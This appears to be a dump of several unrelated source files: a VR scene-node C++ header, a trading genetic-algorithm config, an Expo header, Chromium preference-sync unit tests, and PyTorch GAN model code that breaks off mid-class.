*/ bool _hidden; float _opacityFromHiddenFlag; /* The opacity of the node (0.0 is transparent, 1.0 is opaque). When opacity drops below a threshold value, the node is hidden. This opacity is set by the user. */ float _opacity; /* True if this node is selectable by hit testing. Defaults to true. */ bool _selectable; /* True if this node is set to ignore all events fired from VROBaseInputController. */ bool _ignoreEventHandling; /* Delegate through which events are notified from the VROEventManager. */ std::weak_ptr<VROEventDelegate> _eventDelegateWeak; /* True if we want to perform more accurate event hit testing against this node's geometry rather than its bounding box. */ bool _highAccuracyEvents; /* Active actions on this node. */ std::vector<std::shared_ptr<VROAction>> _actions; /* Animations stored with this node. */ std::map<std::string, std::vector<std::shared_ptr<VROExecutableAnimation>>> _animations; /* Constraints on the node, which can modify the node's transformation matrix. */ std::vector<std::shared_ptr<VROConstraint>> _constraints; /* True indicates that this node's descendants (children, grand-children, and so on) should be rendered by order of their scene graph depth, with depth reading disabled. Useful when rendering 2D layouts like flexbox views, where the parent components and their children have depths so close together that reverting to the painter's algorithm instead of depth testing produces better results (minimal z-fighting). Defaults to false. */ bool _hierarchicalRendering; /* The drag type to use for this VRONode. */ VRODragType _dragType; /* The point in 3D space on the plane to "drag" */ VROVector3f _dragPlanePoint; /* The normal of the plane to "drag" along */ VROVector3f _dragPlaneNormal; /* The max distance from the controller the user is allowed to drag an item (threshold behavior depends on the _dragType selected). 
*/ float _dragMaxDistance; /* Whether or not a drag is still being animated (used only if _dragType == VRODragType::FixedToWorld */ bool _isAnimatingDrag; /* The VROTransaction representing the animation from dragging while _dragType == VRODragType::FixedToWorld. */ std::shared_ptr<VROTransaction> _dragAnimation; #pragma mark - Private /* Notifies attached transform delegate, if any, that a position change had occurred. */ void notifyTransformUpdate(bool forced); /* Recursively set the visibility of this node and all of its children to the given value. */ void setVisibilityRecursive(bool visible); /* Recursively expand the given bounding box by this node's _worldBoundingBox. */ void computeUmbrellaBounds(); bool computeUmbrellaBounds(VROBoundingBox *localBounds, VROBoundingBox *worldBounds, VROMatrix4f transform, bool isSet) const; /* Compute the transform for this node, taking into the account the parent's transform. Updates all related variables: _worldTransform _worldPosition _worldBoundingBox */ void doComputeTransform(VROMatrix4f parentTransform); /* Action processing: execute all current actions and remove those that are expired. */ void processActions(); /* Get the animations in this node under the given key, and add them to the given vector. */ void getAnimations(std::vector<std::shared_ptr<VROExecutableAnimation>> &animations, std::string key, bool recursive); /* Get the keys of all animations in this node, and add them to the given set. */ void getAnimationKeys(std::set<std::string> &animations, bool recursive); /* Hit test helper functions. */ void hitTest(const VROCamera &camera, VROVector3f origin, VROVector3f ray, bool boundsOnly, std::vector<VROHitTestResult> &results); bool hitTestGeometry(VROVector3f origin, VROVector3f ray, VROMatrix4f transform, VROVector3f *intPt); /* The light and shadow bit masks. These are logically ANDed with each light's influence bit mask. 
If the result is non-zero for the light bit mask, then the light will illuminate the node. If the result is zero, then this node will be excluded from the light's illumination, including receipt of that light's shadows. If the AND result is non-zero for the shadow casting bit map, then the node will be cast shadows from the light (e.g. it will be rendered to that light's shadow map). If the result is zero, it will not cast shadows from said light. These both default to 1. */ int _lightReceivingBitMask; int _shadowCastingBitMask; /* Physics rigid body that if defined, drives and sets the transformations of this node. */ std::shared_ptr<VROPhysicsBody> _physicsBody; /* Non-unique tag identifier representing this node. Defaults to kDefaultNodeTag. */ std::string _tag = kDefaultNodeTag; /* Used internally to hold the rendering of a node and all of its children until a model load callback has been invoked. */ bool _holdRendering; /* Task queus used for loading objects into this VRONode. We store these here in order to scope them to the lifetime of the node for which they are performing loading tasks. */ std::vector<std::shared_ptr<VROTaskQueue>> _taskQueues; }; #endif /* VRONode_h */
14,733
5,871
<filename>scripts/genetic_algo/conf.py<gh_stars>1000+ import random selectors = { 'BTC-CUR': ['gdax.BTC-USD', 'gdax.BTC-EUR', 'gdax.BTC-GBP'], 'ETH-BTC': ['gdax.ETH-BTC'], 'ETH-EUR': ['gdax.ETH-EUR'], 'ETH-USD': ['gdax.ETH-USD'], 'ETH-CUR': ['gdax.ETH-USD', 'gdax.ETH-EUR'], } partitions = 2 selectivity = 0.3 runid = random.randint(1000, 9999) sigma = 20 indpb = 0.3 mutpb = 0.3 cxpb = 0.3
208
1,338
#include <../os/package/hpkg/PackageData.h>
17
16,461
<filename>ios/Exponent/Kernel/Services/EXPermissionsManager.h // Copyright 2019-present 650 Industries. All rights reserved. #import <ExpoModulesCore/EXSingletonModule.h> #import "EXScopedPermissions.h" NS_ASSUME_NONNULL_BEGIN @interface EXPermissionsManager : EXSingletonModule <EXPermissionsScopedModuleDelegate> @end NS_ASSUME_NONNULL_END
115
777
<reponame>google-ar/chromium<gh_stars>100-1000 // Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "components/sync_preferences/pref_service_syncable.h" #include <stdint.h> #include <memory> #include "base/json/json_reader.h" #include "base/json/json_string_value_serializer.h" #include "base/json/json_writer.h" #include "base/macros.h" #include "base/memory/ptr_util.h" #include "base/message_loop/message_loop.h" #include "base/strings/utf_string_conversions.h" #include "components/pref_registry/pref_registry_syncable.h" #include "components/prefs/scoped_user_pref_update.h" #include "components/sync/model/attachments/attachment_id.h" #include "components/sync/model/attachments/attachment_service_proxy_for_test.h" #include "components/sync/model/sync_change.h" #include "components/sync/model/sync_data.h" #include "components/sync/model/sync_error_factory_mock.h" #include "components/sync/model/syncable_service.h" #include "components/sync/protocol/preference_specifics.pb.h" #include "components/sync/protocol/sync.pb.h" #include "components/sync_preferences/pref_model_associator.h" #include "components/sync_preferences/pref_model_associator_client.h" #include "components/sync_preferences/testing_pref_service_syncable.h" #include "testing/gtest/include/gtest/gtest.h" using syncer::SyncChange; using syncer::SyncData; namespace sync_preferences { namespace { const char kExampleUrl0[] = "http://example.com/0"; const char kExampleUrl1[] = "http://example.com/1"; const char kExampleUrl2[] = "http://example.com/2"; const char kStringPrefName[] = "string_pref_name"; const char kListPrefName[] = "list_pref_name"; const char kUnsyncedPreferenceName[] = "nonsense_pref_name"; const char kUnsyncedPreferenceDefaultValue[] = "default"; const char kDefaultCharsetPrefName[] = "default_charset"; const char kNonDefaultCharsetValue[] = "foo"; const char 
kDefaultCharsetValue[] = "utf-8"; void Increment(int* num) { (*num)++; } class TestPrefModelAssociatorClient : public PrefModelAssociatorClient { public: TestPrefModelAssociatorClient() {} ~TestPrefModelAssociatorClient() override {} // PrefModelAssociatorClient implementation. bool IsMergeableListPreference(const std::string& pref_name) const override { return pref_name == kListPrefName; } bool IsMergeableDictionaryPreference( const std::string& pref_name) const override { return false; } private: DISALLOW_COPY_AND_ASSIGN(TestPrefModelAssociatorClient); }; class TestSyncProcessorStub : public syncer::SyncChangeProcessor { public: explicit TestSyncProcessorStub(syncer::SyncChangeList* output) : output_(output), fail_next_(false) {} syncer::SyncError ProcessSyncChanges( const tracked_objects::Location& from_here, const syncer::SyncChangeList& change_list) override { if (output_) output_->insert(output_->end(), change_list.begin(), change_list.end()); if (fail_next_) { fail_next_ = false; return syncer::SyncError(FROM_HERE, syncer::SyncError::DATATYPE_ERROR, "Error", syncer::PREFERENCES); } return syncer::SyncError(); } void FailNextProcessSyncChanges() { fail_next_ = true; } syncer::SyncDataList GetAllSyncData(syncer::ModelType type) const override { return syncer::SyncDataList(); } private: syncer::SyncChangeList* output_; bool fail_next_; }; class PrefServiceSyncableTest : public testing::Test { public: PrefServiceSyncableTest() : pref_sync_service_(NULL), test_processor_(NULL), next_pref_remote_sync_node_id_(0) {} void SetUp() override { prefs_.SetPrefModelAssociatorClientForTesting(&client_); prefs_.registry()->RegisterStringPref(kUnsyncedPreferenceName, kUnsyncedPreferenceDefaultValue); prefs_.registry()->RegisterStringPref( kStringPrefName, std::string(), user_prefs::PrefRegistrySyncable::SYNCABLE_PREF); prefs_.registry()->RegisterListPref( kListPrefName, user_prefs::PrefRegistrySyncable::SYNCABLE_PREF); prefs_.registry()->RegisterStringPref( 
kDefaultCharsetPrefName, kDefaultCharsetValue, user_prefs::PrefRegistrySyncable::SYNCABLE_PREF); pref_sync_service_ = reinterpret_cast<PrefModelAssociator*>( prefs_.GetSyncableService(syncer::PREFERENCES)); ASSERT_TRUE(pref_sync_service_); } syncer::SyncChange MakeRemoteChange(int64_t id, const std::string& name, const base::Value& value, SyncChange::SyncChangeType type) { std::string serialized; JSONStringValueSerializer json(&serialized); if (!json.Serialize(value)) return syncer::SyncChange(); sync_pb::EntitySpecifics entity; sync_pb::PreferenceSpecifics* pref_one = entity.mutable_preference(); pref_one->set_name(name); pref_one->set_value(serialized); return syncer::SyncChange( FROM_HERE, type, syncer::SyncData::CreateRemoteData( id, entity, base::Time(), syncer::AttachmentIdList(), syncer::AttachmentServiceProxyForTest::Create())); } void AddToRemoteDataList(const std::string& name, const base::Value& value, syncer::SyncDataList* out) { std::string serialized; JSONStringValueSerializer json(&serialized); ASSERT_TRUE(json.Serialize(value)); sync_pb::EntitySpecifics one; sync_pb::PreferenceSpecifics* pref_one = one.mutable_preference(); pref_one->set_name(name); pref_one->set_value(serialized); out->push_back(SyncData::CreateRemoteData( ++next_pref_remote_sync_node_id_, one, base::Time(), syncer::AttachmentIdList(), syncer::AttachmentServiceProxyForTest::Create())); } void InitWithSyncDataTakeOutput(const syncer::SyncDataList& initial_data, syncer::SyncChangeList* output) { test_processor_ = new TestSyncProcessorStub(output); syncer::SyncMergeResult r = pref_sync_service_->MergeDataAndStartSyncing( syncer::PREFERENCES, initial_data, base::WrapUnique(test_processor_), base::MakeUnique<syncer::SyncErrorFactoryMock>()); EXPECT_FALSE(r.error().IsSet()); } void InitWithNoSyncData() { InitWithSyncDataTakeOutput(syncer::SyncDataList(), NULL); } const base::Value& GetPreferenceValue(const std::string& name) { const PrefService::Preference* preference = 
prefs_.FindPreference(name.c_str()); return *preference->GetValue(); } std::unique_ptr<base::Value> FindValue(const std::string& name, const syncer::SyncChangeList& list) { syncer::SyncChangeList::const_iterator it = list.begin(); for (; it != list.end(); ++it) { if (syncer::SyncDataLocal(it->sync_data()).GetTag() == name) { return base::JSONReader::Read( it->sync_data().GetSpecifics().preference().value()); } } return nullptr; } bool IsSynced(const std::string& pref_name) { return pref_sync_service_->registered_preferences().count(pref_name) > 0; } bool HasSyncData(const std::string& pref_name) { return pref_sync_service_->IsPrefSynced(pref_name); } PrefService* GetPrefs() { return &prefs_; } TestingPrefServiceSyncable* GetTestingPrefService() { return &prefs_; } protected: TestPrefModelAssociatorClient client_; TestingPrefServiceSyncable prefs_; PrefModelAssociator* pref_sync_service_; TestSyncProcessorStub* test_processor_; // TODO(tim): Remove this by fixing AttachmentServiceProxyForTest. 
base::MessageLoop loop_; int next_pref_remote_sync_node_id_; }; TEST_F(PrefServiceSyncableTest, CreatePrefSyncData) { prefs_.SetString(kStringPrefName, kExampleUrl0); const PrefService::Preference* pref = prefs_.FindPreference(kStringPrefName); syncer::SyncData sync_data; EXPECT_TRUE(pref_sync_service_->CreatePrefSyncData( pref->name(), *pref->GetValue(), &sync_data)); EXPECT_EQ(std::string(kStringPrefName), syncer::SyncDataLocal(sync_data).GetTag()); const sync_pb::PreferenceSpecifics& specifics( sync_data.GetSpecifics().preference()); EXPECT_EQ(std::string(kStringPrefName), specifics.name()); std::unique_ptr<base::Value> value = base::JSONReader::Read(specifics.value()); EXPECT_TRUE(pref->GetValue()->Equals(value.get())); } TEST_F(PrefServiceSyncableTest, ModelAssociationDoNotSyncDefaults) { const PrefService::Preference* pref = prefs_.FindPreference(kStringPrefName); EXPECT_TRUE(pref->IsDefaultValue()); syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); EXPECT_TRUE(IsSynced(kStringPrefName)); EXPECT_TRUE(pref->IsDefaultValue()); EXPECT_FALSE(FindValue(kStringPrefName, out).get()); } TEST_F(PrefServiceSyncableTest, ModelAssociationEmptyCloud) { prefs_.SetString(kStringPrefName, kExampleUrl0); { ListPrefUpdate update(GetPrefs(), kListPrefName); base::ListValue* url_list = update.Get(); url_list->AppendString(kExampleUrl0); url_list->AppendString(kExampleUrl1); } syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); std::unique_ptr<base::Value> value(FindValue(kStringPrefName, out)); ASSERT_TRUE(value.get()); EXPECT_TRUE(GetPreferenceValue(kStringPrefName).Equals(value.get())); value = FindValue(kListPrefName, out); ASSERT_TRUE(value.get()); EXPECT_TRUE(GetPreferenceValue(kListPrefName).Equals(value.get())); } TEST_F(PrefServiceSyncableTest, ModelAssociationCloudHasData) { prefs_.SetString(kStringPrefName, kExampleUrl0); { ListPrefUpdate update(GetPrefs(), kListPrefName); base::ListValue* url_list = 
update.Get(); url_list->AppendString(kExampleUrl0); url_list->AppendString(kExampleUrl1); } syncer::SyncDataList in; syncer::SyncChangeList out; AddToRemoteDataList(kStringPrefName, base::StringValue(kExampleUrl1), &in); base::ListValue urls_to_restore; urls_to_restore.AppendString(kExampleUrl1); urls_to_restore.AppendString(kExampleUrl2); AddToRemoteDataList(kListPrefName, urls_to_restore, &in); AddToRemoteDataList(kDefaultCharsetPrefName, base::StringValue(kNonDefaultCharsetValue), &in); InitWithSyncDataTakeOutput(in, &out); ASSERT_FALSE(FindValue(kStringPrefName, out).get()); ASSERT_FALSE(FindValue(kDefaultCharsetPrefName, out).get()); EXPECT_EQ(kExampleUrl1, prefs_.GetString(kStringPrefName)); std::unique_ptr<base::ListValue> expected_urls(new base::ListValue); expected_urls->AppendString(kExampleUrl1); expected_urls->AppendString(kExampleUrl2); expected_urls->AppendString(kExampleUrl0); std::unique_ptr<base::Value> value(FindValue(kListPrefName, out)); ASSERT_TRUE(value.get()); EXPECT_TRUE(value->Equals(expected_urls.get())); EXPECT_TRUE(GetPreferenceValue(kListPrefName).Equals(expected_urls.get())); EXPECT_EQ(kNonDefaultCharsetValue, prefs_.GetString(kDefaultCharsetPrefName)); } TEST_F(PrefServiceSyncableTest, FailModelAssociation) { syncer::SyncChangeList output; TestSyncProcessorStub* stub = new TestSyncProcessorStub(&output); stub->FailNextProcessSyncChanges(); syncer::SyncMergeResult r = pref_sync_service_->MergeDataAndStartSyncing( syncer::PREFERENCES, syncer::SyncDataList(), base::WrapUnique(stub), base::MakeUnique<syncer::SyncErrorFactoryMock>()); EXPECT_TRUE(r.error().IsSet()); } TEST_F(PrefServiceSyncableTest, UpdatedPreferenceWithDefaultValue) { const PrefService::Preference* pref = prefs_.FindPreference(kStringPrefName); EXPECT_TRUE(pref->IsDefaultValue()); syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); out.clear(); base::StringValue expected(kExampleUrl0); GetPrefs()->Set(kStringPrefName, expected); 
std::unique_ptr<base::Value> actual(FindValue(kStringPrefName, out)); ASSERT_TRUE(actual.get()); EXPECT_TRUE(expected.Equals(actual.get())); } TEST_F(PrefServiceSyncableTest, UpdatedPreferenceWithValue) { GetPrefs()->SetString(kStringPrefName, kExampleUrl0); syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); out.clear(); base::StringValue expected(kExampleUrl1); GetPrefs()->Set(kStringPrefName, expected); std::unique_ptr<base::Value> actual(FindValue(kStringPrefName, out)); ASSERT_TRUE(actual.get()); EXPECT_TRUE(expected.Equals(actual.get())); } TEST_F(PrefServiceSyncableTest, UpdatedSyncNodeActionUpdate) { GetPrefs()->SetString(kStringPrefName, kExampleUrl0); InitWithNoSyncData(); base::StringValue expected(kExampleUrl1); syncer::SyncChangeList list; list.push_back(MakeRemoteChange(1, kStringPrefName, expected, SyncChange::ACTION_UPDATE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); const base::Value& actual = GetPreferenceValue(kStringPrefName); EXPECT_TRUE(expected.Equals(&actual)); } TEST_F(PrefServiceSyncableTest, UpdatedSyncNodeActionAdd) { InitWithNoSyncData(); base::StringValue expected(kExampleUrl0); syncer::SyncChangeList list; list.push_back( MakeRemoteChange(1, kStringPrefName, expected, SyncChange::ACTION_ADD)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); const base::Value& actual = GetPreferenceValue(kStringPrefName); EXPECT_TRUE(expected.Equals(&actual)); EXPECT_EQ( 1U, pref_sync_service_->registered_preferences().count(kStringPrefName)); } TEST_F(PrefServiceSyncableTest, UpdatedSyncNodeUnknownPreference) { InitWithNoSyncData(); syncer::SyncChangeList list; base::StringValue expected(kExampleUrl0); list.push_back(MakeRemoteChange(1, "unknown preference", expected, SyncChange::ACTION_UPDATE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); // Nothing interesting happens on the client when it gets an update // of an unknown preference. We just should not crash. 
} TEST_F(PrefServiceSyncableTest, ManagedPreferences) { // Make the homepage preference managed. base::StringValue managed_value("http://example.com"); prefs_.SetManagedPref(kStringPrefName, managed_value.DeepCopy()); syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); out.clear(); // Changing the homepage preference should not sync anything. base::StringValue user_value("http://chromium..com"); prefs_.SetUserPref(kStringPrefName, user_value.DeepCopy()); EXPECT_TRUE(out.empty()); // An incoming sync transaction should change the user value, not the managed // value. base::StringValue sync_value("http://crbug.com"); syncer::SyncChangeList list; list.push_back(MakeRemoteChange(1, kStringPrefName, sync_value, SyncChange::ACTION_UPDATE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); EXPECT_TRUE(managed_value.Equals(prefs_.GetManagedPref(kStringPrefName))); EXPECT_TRUE(sync_value.Equals(prefs_.GetUserPref(kStringPrefName))); } // List preferences have special handling at association time due to our ability // to merge the local and sync value. Make sure the merge logic doesn't merge // managed preferences. TEST_F(PrefServiceSyncableTest, ManagedListPreferences) { // Make the list of urls to restore on startup managed. base::ListValue managed_value; managed_value.AppendString(kExampleUrl0); managed_value.AppendString(kExampleUrl1); prefs_.SetManagedPref(kListPrefName, managed_value.DeepCopy()); // Set a cloud version. syncer::SyncDataList in; syncer::SyncChangeList out; base::ListValue urls_to_restore; urls_to_restore.AppendString(kExampleUrl1); urls_to_restore.AppendString(kExampleUrl2); AddToRemoteDataList(kListPrefName, urls_to_restore, &in); // Start sync and verify the synced value didn't get merged. InitWithSyncDataTakeOutput(in, &out); EXPECT_FALSE(FindValue(kListPrefName, out).get()); out.clear(); // Changing the user's urls to restore on startup pref should not sync // anything. 
base::ListValue user_value; user_value.AppendString("http://chromium.org"); prefs_.SetUserPref(kListPrefName, user_value.DeepCopy()); EXPECT_FALSE(FindValue(kListPrefName, out).get()); // An incoming sync transaction should change the user value, not the managed // value. base::ListValue sync_value; sync_value.AppendString("http://crbug.com"); syncer::SyncChangeList list; list.push_back(MakeRemoteChange(1, kListPrefName, sync_value, SyncChange::ACTION_UPDATE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); EXPECT_TRUE(managed_value.Equals(prefs_.GetManagedPref(kListPrefName))); EXPECT_TRUE(sync_value.Equals(prefs_.GetUserPref(kListPrefName))); } TEST_F(PrefServiceSyncableTest, DynamicManagedPreferences) { syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); out.clear(); base::StringValue initial_value("http://example.com/initial"); GetPrefs()->Set(kStringPrefName, initial_value); std::unique_ptr<base::Value> actual(FindValue(kStringPrefName, out)); ASSERT_TRUE(actual.get()); EXPECT_TRUE(initial_value.Equals(actual.get())); // Switch kHomePage to managed and set a different value. base::StringValue managed_value("http://example.com/managed"); GetTestingPrefService()->SetManagedPref(kStringPrefName, managed_value.DeepCopy()); // The pref value should be the one dictated by policy. EXPECT_TRUE(managed_value.Equals(&GetPreferenceValue(kStringPrefName))); // Switch kHomePage back to unmanaged. GetTestingPrefService()->RemoveManagedPref(kStringPrefName); // The original value should be picked up. 
EXPECT_TRUE(initial_value.Equals(&GetPreferenceValue(kStringPrefName))); } TEST_F(PrefServiceSyncableTest, DynamicManagedPreferencesWithSyncChange) { syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); out.clear(); base::StringValue initial_value("http://example.com/initial"); GetPrefs()->Set(kStringPrefName, initial_value); std::unique_ptr<base::Value> actual(FindValue(kStringPrefName, out)); EXPECT_TRUE(initial_value.Equals(actual.get())); // Switch kHomePage to managed and set a different value. base::StringValue managed_value("http://example.com/managed"); GetTestingPrefService()->SetManagedPref(kStringPrefName, managed_value.DeepCopy()); // Change the sync value. base::StringValue sync_value("http://example.com/sync"); syncer::SyncChangeList list; list.push_back(MakeRemoteChange(1, kStringPrefName, sync_value, SyncChange::ACTION_UPDATE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); // The pref value should still be the one dictated by policy. EXPECT_TRUE(managed_value.Equals(&GetPreferenceValue(kStringPrefName))); // Switch kHomePage back to unmanaged. GetTestingPrefService()->RemoveManagedPref(kStringPrefName); // Sync value should be picked up. EXPECT_TRUE(sync_value.Equals(&GetPreferenceValue(kStringPrefName))); } TEST_F(PrefServiceSyncableTest, DynamicManagedDefaultPreferences) { const PrefService::Preference* pref = prefs_.FindPreference(kStringPrefName); EXPECT_TRUE(pref->IsDefaultValue()); syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); EXPECT_TRUE(IsSynced(kStringPrefName)); EXPECT_TRUE(pref->IsDefaultValue()); EXPECT_FALSE(FindValue(kStringPrefName, out).get()); out.clear(); // Switch kHomePage to managed and set a different value. base::StringValue managed_value("http://example.com/managed"); GetTestingPrefService()->SetManagedPref(kStringPrefName, managed_value.DeepCopy()); // The pref value should be the one dictated by policy. 
EXPECT_TRUE(managed_value.Equals(&GetPreferenceValue(kStringPrefName))); EXPECT_FALSE(pref->IsDefaultValue()); // There should be no synced value. EXPECT_FALSE(FindValue(kStringPrefName, out).get()); // Switch kHomePage back to unmanaged. GetTestingPrefService()->RemoveManagedPref(kStringPrefName); // The original value should be picked up. EXPECT_TRUE(pref->IsDefaultValue()); // There should still be no synced value. EXPECT_FALSE(FindValue(kStringPrefName, out).get()); } TEST_F(PrefServiceSyncableTest, DeletePreference) { prefs_.SetString(kStringPrefName, kExampleUrl0); const PrefService::Preference* pref = prefs_.FindPreference(kStringPrefName); EXPECT_FALSE(pref->IsDefaultValue()); InitWithNoSyncData(); std::unique_ptr<base::Value> null_value = base::Value::CreateNullValue(); syncer::SyncChangeList list; list.push_back(MakeRemoteChange(1, kStringPrefName, *null_value, SyncChange::ACTION_DELETE)); pref_sync_service_->ProcessSyncChanges(FROM_HERE, list); EXPECT_TRUE(pref->IsDefaultValue()); } TEST_F(PrefServiceSyncableTest, RegisterMergeDataFinishedCallback) { int num_callbacks = 0; prefs_.RegisterMergeDataFinishedCallback( base::Bind(&Increment, &num_callbacks)); EXPECT_EQ(0, num_callbacks); InitWithNoSyncData(); EXPECT_EQ(1, num_callbacks); } } // namespace } // namespace sync_preferences
7,819
1,077
import torch import os import math import torch.nn as nn from torch.nn import init import functools from torch.autograd import Variable import torch.nn.functional as F import numpy as np # from torch.utils.serialization import load_lua from lib.nn import SynchronizedBatchNorm2d as SynBN2d ############################################################################### # Functions ############################################################################### def pad_tensor(input): height_org, width_org = input.shape[2], input.shape[3] divide = 16 if width_org % divide != 0 or height_org % divide != 0: width_res = width_org % divide height_res = height_org % divide if width_res != 0: width_div = divide - width_res pad_left = int(width_div / 2) pad_right = int(width_div - pad_left) else: pad_left = 0 pad_right = 0 if height_res != 0: height_div = divide - height_res pad_top = int(height_div / 2) pad_bottom = int(height_div - pad_top) else: pad_top = 0 pad_bottom = 0 padding = nn.ReflectionPad2d((pad_left, pad_right, pad_top, pad_bottom)) input = padding(input) else: pad_left = 0 pad_right = 0 pad_top = 0 pad_bottom = 0 height, width = input.data.shape[2], input.data.shape[3] assert width % divide == 0, 'width cant divided by stride' assert height % divide == 0, 'height cant divided by stride' return input, pad_left, pad_right, pad_top, pad_bottom def pad_tensor_back(input, pad_left, pad_right, pad_top, pad_bottom): height, width = input.shape[2], input.shape[3] return input[:,:, pad_top: height - pad_bottom, pad_left: width - pad_right] def weights_init(m): classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.02) elif classname.find('BatchNorm2d') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) def get_norm_layer(norm_type='instance'): if norm_type == 'batch': norm_layer = functools.partial(nn.BatchNorm2d, affine=True) elif norm_type == 'instance': norm_layer = functools.partial(nn.InstanceNorm2d, affine=False) 
elif norm_type == 'synBN': norm_layer = functools.partial(SynBN2d, affine=True) else: raise NotImplementedError('normalization layer [%s] is not found' % norm) return norm_layer def define_G(input_nc, output_nc, ngf, which_model_netG, norm='batch', use_dropout=False, gpu_ids=[], skip=False, opt=None): netG = None use_gpu = len(gpu_ids) > 0 norm_layer = get_norm_layer(norm_type=norm) # if use_gpu: # assert(torch.cuda.is_available()) if which_model_netG == 'resnet_9blocks': netG = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, n_blocks=9, gpu_ids=gpu_ids) elif which_model_netG == 'resnet_6blocks': netG = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, n_blocks=6, gpu_ids=gpu_ids) elif which_model_netG == 'unet_128': netG = UnetGenerator(input_nc, output_nc, 7, ngf, norm_layer=norm_layer, use_dropout=use_dropout, gpu_ids=gpu_ids) elif which_model_netG == 'unet_256': netG = UnetGenerator(input_nc, output_nc, 8, ngf, norm_layer=norm_layer, use_dropout=use_dropout, gpu_ids=gpu_ids, skip=skip, opt=opt) elif which_model_netG == 'unet_512': netG = UnetGenerator(input_nc, output_nc, 9, ngf, norm_layer=norm_layer, use_dropout=use_dropout, gpu_ids=gpu_ids, skip=skip, opt=opt) elif which_model_netG == 'sid_unet': netG = Unet(opt, skip) elif which_model_netG == 'sid_unet_shuffle': netG = Unet_pixelshuffle(opt, skip) elif which_model_netG == 'sid_unet_resize': netG = Unet_resize_conv(opt, skip) elif which_model_netG == 'DnCNN': netG = DnCNN(opt, depth=17, n_channels=64, image_channels=1, use_bnorm=True, kernel_size=3) else: raise NotImplementedError('Generator model name [%s] is not recognized' % which_model_netG) if torch.cuda.is_available() and not opt.cFlag: netG.cuda(device=gpu_ids[0]) # netG = torch.nn.DataParallel(netG, gpu_ids) netG.apply(weights_init) return netG def define_D(input_nc, ndf, which_model_netD, n_layers_D=3, norm='batch', use_sigmoid=False, gpu_ids=[], patch=False): netD = 
None use_gpu = len(gpu_ids) > 0 norm_layer = get_norm_layer(norm_type=norm) if use_gpu: assert(torch.cuda.is_available()) if which_model_netD == 'basic': netD = NLayerDiscriminator(input_nc, ndf, n_layers=3, norm_layer=norm_layer, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids) elif which_model_netD == 'n_layers': netD = NLayerDiscriminator(input_nc, ndf, n_layers_D, norm_layer=norm_layer, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids) elif which_model_netD == 'no_norm': netD = NoNormDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids) elif which_model_netD == 'no_norm_4': netD = NoNormDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids) elif which_model_netD == 'no_patchgan': netD = FCDiscriminator(input_nc, ndf, n_layers_D, use_sigmoid=use_sigmoid, gpu_ids=gpu_ids, patch=patch) else: raise NotImplementedError('Discriminator model name [%s] is not recognized' % which_model_netD) if use_gpu: netD.cuda(device=gpu_ids[0]) netD = torch.nn.DataParallel(netD, gpu_ids) netD.apply(weights_init) return netD def print_network(net): num_params = 0 for param in net.parameters(): num_params += param.numel() print(net) print('Total number of parameters: %d' % num_params) ############################################################################## # Classes ############################################################################## # Defines the GAN loss which uses either LSGAN or the regular GAN. 
# When LSGAN is used, it is basically same as MSELoss, # but it abstracts away the need to create the target label tensor # that has the same size as the input class GANLoss(nn.Module): def __init__(self, use_lsgan=True, target_real_label=1.0, target_fake_label=0.0, tensor=torch.FloatTensor): super(GANLoss, self).__init__() self.real_label = target_real_label self.fake_label = target_fake_label self.real_label_var = None self.fake_label_var = None self.Tensor = tensor if use_lsgan: self.loss = nn.MSELoss() else: self.loss = nn.BCELoss() def get_target_tensor(self, input, target_is_real): target_tensor = None if target_is_real: create_label = ((self.real_label_var is None) or (self.real_label_var.numel() != input.numel())) if create_label: real_tensor = self.Tensor(input.size()).fill_(self.real_label) self.real_label_var = Variable(real_tensor, requires_grad=False) target_tensor = self.real_label_var else: create_label = ((self.fake_label_var is None) or (self.fake_label_var.numel() != input.numel())) if create_label: fake_tensor = self.Tensor(input.size()).fill_(self.fake_label) self.fake_label_var = Variable(fake_tensor, requires_grad=False) target_tensor = self.fake_label_var return target_tensor def __call__(self, input, target_is_real): target_tensor = self.get_target_tensor(input, target_is_real) return self.loss(input, target_tensor) class DiscLossWGANGP(): def __init__(self): self.LAMBDA = 10 def name(self): return 'DiscLossWGAN-GP' def initialize(self, opt, tensor): # DiscLossLS.initialize(self, opt, tensor) self.LAMBDA = 10 # def get_g_loss(self, net, realA, fakeB): # # First, G(A) should fake the discriminator # self.D_fake = net.forward(fakeB) # return -self.D_fake.mean() def calc_gradient_penalty(self, netD, real_data, fake_data): alpha = torch.rand(1, 1) alpha = alpha.expand(real_data.size()) alpha = alpha.cuda() interpolates = alpha * real_data + ((1 - alpha) * fake_data) interpolates = interpolates.cuda() interpolates = Variable(interpolates, 
# Resnet-style generator: a few strided downsampling convs, a stack of residual
# blocks at the bottleneck, then mirrored transposed-conv upsampling.
# Architecture follows Johnson et al.'s fast-neural-style generator:
# https://github.com/jcjohnson/fast-neural-style/
class ResnetGenerator(nn.Module):
    """Image-to-image generator built from residual blocks.

    The network maps ``input_nc``-channel images to ``output_nc``-channel
